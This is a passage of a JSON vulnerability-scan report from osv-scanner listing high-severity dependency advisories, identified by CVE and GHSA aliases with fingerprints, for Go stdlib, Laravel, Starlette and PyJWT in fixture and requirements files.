1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32288", "CVE-2026-32288"], "package": "stdlib", "rule_id": "GO-2026-4869", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32288|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4869"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["45c85af3db516fcaaf7d792d757b019c2a051392b8a2841207fe69a866f0e4d6", "be08cdf9ec4ecd894e42dad7b5e0850688a77062b75cde9cea1314f8f97a87f7"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4865", "level": "error", "message": {"text": "stdlib: GO-2026-4865"}, "properties": {"repobilityId": 145103, "scanner": "osv-scanner", "fingerprint": "c616aaa90028d07af00a261e58553e068e9c3a96011909e2ba81f360885acf7c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32289", "CVE-2026-32289"], "package": "stdlib", "rule_id": "GO-2026-4865", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32289|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4865"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["95cc90d5f2125cae6a840110ff15dd2845ee557f3de0a16cdf9f8a8817bd3c22", "c616aaa90028d07af00a261e58553e068e9c3a96011909e2ba81f360885acf7c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4864", "level": "error", "message": {"text": "stdlib: GO-2026-4864"}, "properties": {"repobilityId": 145102, "scanner": "osv-scanner", "fingerprint": "ba11cd164921276a245542095cd2598580d2e04270f9a8eaa1a25f095579f003", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32282", "CVE-2026-32282"], "package": "stdlib", "rule_id": "GO-2026-4864", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32282|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4864"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["791ad2a5eba117ec756b56863a806f5c3fc0e4c74ea0b4c1a1fc428a4963127f", "ba11cd164921276a245542095cd2598580d2e04270f9a8eaa1a25f095579f003"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4603", "level": "error", "message": {"text": "stdlib: GO-2026-4603"}, "properties": {"repobilityId": 145101, "scanner": "osv-scanner", "fingerprint": "a7a140ade0314be4ce3a80f0092df1bdd387274e3672a5a3ab34c094b1602b91", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27142", "CVE-2026-27142"], "package": "stdlib", "rule_id": "GO-2026-4603", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27142|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4603"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["9520eb16c207694d90fca10047ec69e72044acddbd50239812137d6d52183fc1", "a7a140ade0314be4ce3a80f0092df1bdd387274e3672a5a3ab34c094b1602b91"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4602", "level": "error", "message": {"text": "stdlib: GO-2026-4602"}, "properties": {"repobilityId": 145100, "scanner": "osv-scanner", "fingerprint": "929ebe3ca01d37ddcb4fd2e217cf565ced5bc7b541562583c7a9aacdca533f71", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27139", "CVE-2026-27139"], "package": "stdlib", "rule_id": "GO-2026-4602", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27139|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4602"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["929ebe3ca01d37ddcb4fd2e217cf565ced5bc7b541562583c7a9aacdca533f71", "e0fec3a93b7bc2bbe17b64c71c8c19b6533f5d82b15d09ed13fa12e06b87d33d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4601", "level": "error", "message": {"text": "stdlib: GO-2026-4601"}, "properties": {"repobilityId": 145099, "scanner": "osv-scanner", "fingerprint": "ac5384d34aae13f81419703bd402d363945a87374cd8d2cda23f21994870dfab", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-25679", "CVE-2026-25679"], "package": "stdlib", "rule_id": "GO-2026-4601", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-25679|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4601"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["ac5384d34aae13f81419703bd402d363945a87374cd8d2cda23f21994870dfab", "e1b28680733b0f28d9b4c1be4ed3de1b07ae22249920c361a4f3975c4f7253c3"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4342", "level": "error", "message": {"text": "stdlib: GO-2026-4342"}, "properties": {"repobilityId": 145098, "scanner": "osv-scanner", "fingerprint": "4bff11983ab4b1bdb4ce57ed7e27cd72244471d5b8161a2a7881dcfd84a74fef", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61728", "CVE-2025-61728"], "package": "stdlib", "rule_id": "GO-2026-4342", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61728|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4342"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["4bff11983ab4b1bdb4ce57ed7e27cd72244471d5b8161a2a7881dcfd84a74fef", "d95af2920097317919f996d41c89245b3fe1f67709d1a663e7c56c89ec7d8ec4"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4341", "level": "error", "message": {"text": "stdlib: GO-2026-4341"}, "properties": {"repobilityId": 145097, "scanner": "osv-scanner", "fingerprint": "761428e98e5931ec485d64948432ffe377a1f704ce06be4823371361a8d2229d", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61726", "CVE-2025-61726"], "package": "stdlib", "rule_id": "GO-2026-4341", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61726|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4341"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["585c4ab21b9b5633ba56173cbf45ab77714590b5ab38177a3c7744009beed862", "761428e98e5931ec485d64948432ffe377a1f704ce06be4823371361a8d2229d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4340", "level": "error", "message": {"text": "stdlib: GO-2026-4340"}, "properties": {"repobilityId": 145096, "scanner": "osv-scanner", "fingerprint": "cb14c619f4d650cdaca5c53ccfcf4d0de13ff9534facb83acdad32462b18a2fb", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61730", "CVE-2025-61730"], "package": "stdlib", "rule_id": "GO-2026-4340", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61730|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4340"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["9a967fea1379b4b84ba86476d48d7a604fac04c1e24a33aa1b4b3e0ffff48d45", "cb14c619f4d650cdaca5c53ccfcf4d0de13ff9534facb83acdad32462b18a2fb"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4337", "level": "error", "message": {"text": "stdlib: GO-2026-4337"}, "properties": {"repobilityId": 145095, "scanner": "osv-scanner", "fingerprint": "84e994c2804352db6f9af8d61a75766c161f1673a69f48e492cf20a23449c253", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-68121", "CVE-2025-68121"], "package": "stdlib", "rule_id": "GO-2026-4337", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-68121|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4337"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["84e994c2804352db6f9af8d61a75766c161f1673a69f48e492cf20a23449c253", "ecbc5afa220304f948098106f13edd054a24b82fd38acb385d5c9a2a8e51bdd6"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4175", "level": "error", "message": {"text": "stdlib: GO-2025-4175"}, "properties": {"repobilityId": 145094, "scanner": "osv-scanner", "fingerprint": "9cd77a1f7562c5349789f415af9f5ac7c3b303a3f2d1a7dcefb4cb3b5a45f59c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61727", "CVE-2025-61727"], "package": "stdlib", "rule_id": "GO-2025-4175", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61727|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4175"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["54234509c95cfb62faac1f2c01702fc89bedfdaebf98f887177074bb235c3428", "9cd77a1f7562c5349789f415af9f5ac7c3b303a3f2d1a7dcefb4cb3b5a45f59c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4155", "level": "error", "message": {"text": "stdlib: GO-2025-4155"}, "properties": {"repobilityId": 145093, "scanner": "osv-scanner", "fingerprint": "b0747eb6905a25ab553b04398d477668bfca7afab605ac7515911c4744febd8d", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61729", "CVE-2025-61729"], "package": "stdlib", "rule_id": "GO-2025-4155", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61729|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4155"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["91c1f32d895639e6982306351d0b18022b5930cae0c367647d90cf8ac49250b1", "b0747eb6905a25ab553b04398d477668bfca7afab605ac7515911c4744febd8d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4015", "level": "error", "message": {"text": "stdlib: GO-2025-4015"}, "properties": {"repobilityId": 145092, "scanner": "osv-scanner", "fingerprint": "f97eb9832ed41295fbcc4d9eccebc87b4088f62146f907d37c11896c665c250a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61724", "CVE-2025-61724"], "package": "stdlib", "rule_id": "GO-2025-4015", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61724|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4015"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5078dfb17df5cbfc66a3c33890bd3c2b07b4704dcd27cf2a71dd579a4bc2af74", "f97eb9832ed41295fbcc4d9eccebc87b4088f62146f907d37c11896c665c250a"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4014", "level": "error", "message": {"text": "stdlib: GO-2025-4014"}, "properties": {"repobilityId": 145091, "scanner": "osv-scanner", "fingerprint": "95bbd234df2dd7f54ccc8e32dc8e2330efc78f0ae4525a45261a7de55feba8cd", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58183", "CVE-2025-58183"], "package": "stdlib", "rule_id": "GO-2025-4014", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58183|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4014"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["95bbd234df2dd7f54ccc8e32dc8e2330efc78f0ae4525a45261a7de55feba8cd", "f1c4f3b8cc26231c55246d14ed4ebd8b5634faa6aa9a2d93e4365d72acd1888d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4013", "level": "error", "message": {"text": "stdlib: GO-2025-4013"}, "properties": {"repobilityId": 145090, "scanner": "osv-scanner", "fingerprint": "eec11caafa7439fcf76da7d19b1d4ddc6cb779338f8801bca3204d79fedb8f3f", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58188", "CVE-2025-58188"], "package": "stdlib", "rule_id": "GO-2025-4013", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58188|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4013"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["41dde09e038941ea1f2559c3518ad414b561b3007fe88c7d5974099f7172792d", "eec11caafa7439fcf76da7d19b1d4ddc6cb779338f8801bca3204d79fedb8f3f"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4012", "level": "error", "message": {"text": "stdlib: GO-2025-4012"}, "properties": {"repobilityId": 145089, "scanner": "osv-scanner", "fingerprint": "573f4561515c1adad5841a09755428c9d8178fe6b2f5a52a26d2b4f1dc42912c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58186", "CVE-2025-58186"], "package": "stdlib", "rule_id": "GO-2025-4012", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58186|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4012"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0323ef68f5a841993e76169716558fd903ed3d328ae0830ea6a1f9725f8a082f", "573f4561515c1adad5841a09755428c9d8178fe6b2f5a52a26d2b4f1dc42912c"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4011", "level": "error", "message": {"text": "stdlib: GO-2025-4011"}, "properties": {"repobilityId": 145088, "scanner": "osv-scanner", "fingerprint": "2d81742d463c091e5ffd4a3180ed78177b222c23678ccbf7d19a9626e06a5e79", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58185", "CVE-2025-58185"], "package": "stdlib", "rule_id": "GO-2025-4011", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58185|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4011"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2d81742d463c091e5ffd4a3180ed78177b222c23678ccbf7d19a9626e06a5e79", "394851c931ba3693283618cb21b8e859953fb5654c5fa08c13359b1f663a6531"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4010", "level": "error", "message": {"text": "stdlib: GO-2025-4010"}, "properties": {"repobilityId": 145087, "scanner": "osv-scanner", "fingerprint": "0c1362abe932fd8c93847bcabf0eccbf54e84f7c66bf369eeb3a19e68cc044c5", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-47912", "CVE-2025-47912"], "package": "stdlib", "rule_id": "GO-2025-4010", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-47912|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4010"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0c1362abe932fd8c93847bcabf0eccbf54e84f7c66bf369eeb3a19e68cc044c5", "d83f9eac6d038175e7ddd898b419ae33e45b7b79a9806ccb2d108536f097de09"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4009", "level": "error", "message": {"text": "stdlib: GO-2025-4009"}, "properties": {"repobilityId": 145086, "scanner": "osv-scanner", "fingerprint": "6fc4a7d4422e1e764a42c0ea91326c01254c9a7949ec46cd12af1c8906bfdfd2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61723", "CVE-2025-61723"], "package": "stdlib", "rule_id": "GO-2025-4009", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61723|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4009"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["6fc4a7d4422e1e764a42c0ea91326c01254c9a7949ec46cd12af1c8906bfdfd2", "7dfc418d42aad0c1ffdb835193f2b7610b504faa5ff0a0d243207d4ca6b2ce56"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4008", "level": "error", "message": {"text": "stdlib: GO-2025-4008"}, "properties": {"repobilityId": 145085, "scanner": "osv-scanner", "fingerprint": "ec8b8f66a5c5ff6ab2e64ddafaa8efc3f342ddfa7337ceb26316a80e76b572bd", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58189", "CVE-2025-58189"], "package": "stdlib", "rule_id": "GO-2025-4008", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58189|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4008"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["509eee6b0cee6248ce7acf3291b0df6b9850e9051e8c7c540f49ff56d4d719ca", "ec8b8f66a5c5ff6ab2e64ddafaa8efc3f342ddfa7337ceb26316a80e76b572bd"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4007", "level": "error", "message": {"text": "stdlib: GO-2025-4007"}, "properties": {"repobilityId": 145084, "scanner": "osv-scanner", "fingerprint": "9ec125bff2d308da46522b768a33a3d6661467c37e8230fbaa757051b8401634", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-58187", "CVE-2025-58187"], "package": "stdlib", "rule_id": "GO-2025-4007", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-58187|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4007"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["1f121dcc377df8387a02f67f80344fdc68ca1931c040921ee696190511f071a2", "9ec125bff2d308da46522b768a33a3d6661467c37e8230fbaa757051b8401634"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2025-4006", "level": "error", "message": {"text": "stdlib: GO-2025-4006"}, "properties": {"repobilityId": 145083, "scanner": "osv-scanner", "fingerprint": "a770dd456e5ca4a7e669ce8b5b94473ff9f160de152f3c63cb1383e46bbedd13", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2025-61725", "CVE-2025-61725"], "package": "stdlib", "rule_id": "GO-2025-4006", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2025-61725|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2025-4006"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["a770dd456e5ca4a7e669ce8b5b94473ff9f160de152f3c63cb1383e46bbedd13", "f2dd2991845d8cf5116d38d1c2e958c43fe14fba3f98da2875b0d424f079620f"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-gv7v-rgg6-548h", "level": "error", "message": {"text": "laravel/framework: GHSA-gv7v-rgg6-548h"}, "properties": {"repobilityId": 145082, "scanner": "osv-scanner", "fingerprint": "cab2a5eef5ae312ba5e7733c68bb81ab723b9fe7fff83812603a55831adc8f9b", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["BIT-laravel-2024-52301", "CVE-2024-52301"], "package": "laravel/framework", "rule_id": "GHSA-gv7v-rgg6-548h", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-52301|token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-vulnerable/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145078, "scanner": "osv-scanner", "fingerprint": "6c3fcf86b8f63f4c3ca9d5ef113bb3a8e6ef998d023094d24d07331a1f1634c2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|requirements.txt", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["544f51cbd2f65cfda3acbe070980bbe551ddfd354c9e4410e9af80f90268fa0a", "6c3fcf86b8f63f4c3ca9d5ef113bb3a8e6ef998d023094d24d07331a1f1634c2"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145077, "scanner": "osv-scanner", "fingerprint": "5c3eafc67979022f561e9d4f5419a08a2752d1c1403b6231e0286243dc4de621", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145076, "scanner": "osv-scanner", "fingerprint": "d78da9b30f77c7f52b6df8d66103d01f553e3bf4dd2178d5ea0b37402014cb9a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145075, "scanner": "osv-scanner", "fingerprint": "3efd69038a22cfd1254fc5996a1045b73353f48034b55443c679a98678e7502c", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", "rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145074, "scanner": "osv-scanner", "fingerprint": "6e43e9e4fcddce5ed9d95508ee3af57e07c02f8be6ef2b4c716c8f00f38e9ef4", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48522|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145070, "scanner": "osv-scanner", "fingerprint": "9f5157a4b7e18e3e5c909d3b190cea06647368a6f8c4a5fc6378d5f5d990e58e", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|docker-requirements.txt", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["61c62df1f1bb49ab99cb59e0e8fbaade2dc47cf5bbc4431be4362db57604cb1f", "9f5157a4b7e18e3e5c909d3b190cea06647368a6f8c4a5fc6378d5f5d990e58e"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": 